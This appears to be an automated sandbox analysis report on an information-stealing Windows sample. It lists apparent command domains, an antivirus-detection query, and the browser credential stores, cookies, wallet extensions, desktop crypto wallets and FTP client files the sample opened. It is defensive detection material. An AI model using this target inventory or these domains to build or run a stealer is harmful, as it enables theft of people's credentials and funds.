              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: finickypwk.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: shoefeatthe.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: savorraiykj.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: kickykiduz.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: miniatureyu.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: leggelatez.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: washyceehsu.lat
              Source: yTRd6nkLWV.exe, 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: bloodyswif.lat
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528747232.0000000000727000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000693000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1540482872.0000000000694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: yTRd6nkLWV.exe PID: 7532, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: yTRd6nkLWV.exe, 00000001.00000003.1486470955.0000000000727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/Electrum-LTC
              Source: yTRd6nkLWV.exe, 00000001.00000003.1486470955.0000000000727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: qllets/ElectronCash
              Source: yTRd6nkLWV.exeString found in binary or memory: Jaxx Liberty
              Source: yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: yTRd6nkLWV.exe, 00000001.00000003.1499124135.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: yTRd6nkLWV.exe, 00000001.00000003.1499124135.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: yTRd6nkLWV.exe, 00000001.00000003.1515045106.0000000000720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: yTRd6nkLWV.exe, 00000001.00000003.1517807801.0000000000675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: Yara matchFile source: 00000001.00000003.1473028075.0000000000706000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: yTRd6nkLWV.exe PID: 7532, type: MEMORYSTR

              Remote Access Functionality

              barindex
